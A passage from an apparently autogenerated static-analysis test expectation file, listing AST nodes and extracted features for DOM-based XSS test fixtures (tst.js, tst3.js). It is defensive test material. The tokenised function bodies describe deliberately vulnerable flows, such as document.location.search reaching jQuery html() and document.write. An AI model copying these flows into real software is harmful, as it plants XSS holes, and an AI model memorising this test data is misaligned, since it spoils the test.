contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:18 | foo.setAttribute | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:30 | exceptional return of foo.set ... ata[p]) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:30 | exceptional return of foo.set ... ata[p]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:30 | exceptional return of foo.set ... ata[p]) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:30 | foo.set ... ata[p]) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:30 | foo.set ... ata[p]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:3:15:30 | foo.set ... ata[p]) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:7:15:18 | setAttribute | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:7:15:18 | setAttribute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:7:15:18 | setAttribute | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:15:20:15:20 | p | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:15:20:15:20 | p | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:15:20:15:20 | p | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:15:20:15:20 | p | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:15:20:15:20 | p | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:15:20:15:20 | p | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:26 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:26 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:26 | data | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:29 | data[p] | CalleeFlexibleAccessPath | foo.setAttribute | | autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:29 | data[p] | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:29 | data[p] | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:29 | data[p] | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:29 | data[p] | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:15:23:15:29 | data[p] | receiverName | foo | +| autogenerated/Xss/DomBasedXss/tst3.js:15:28:15:28 | p | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:28:15:28 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:15:28:15:28 | p | fileImports | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | ansiToHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | ansiToHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | ansiToHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | require | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:1:1 | require | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | 'arguments' object of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | 'arguments' object of function test | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | 'arguments' object of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | exceptional return of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | exceptional return of function test | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | exceptional return of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | return of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | return of function test | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:1:1:22:1 | return of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:1:10:1:13 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:1:10:1:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:1:10:1:13 | test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:12 | target | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:12 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target ... .search | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:7:2:39 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:23 | document | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:23 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:32 | document.location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:32 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:39 | documen ... .search | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:39 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:16:2:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:25:2:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:25:2:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:25:2:32 | location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:25:2:32 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:25:2:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:2:34:2:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:2:34:2:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:2:34:2:39 | search | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:2:34:2:39 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:2:34:2:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:3 | $ | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
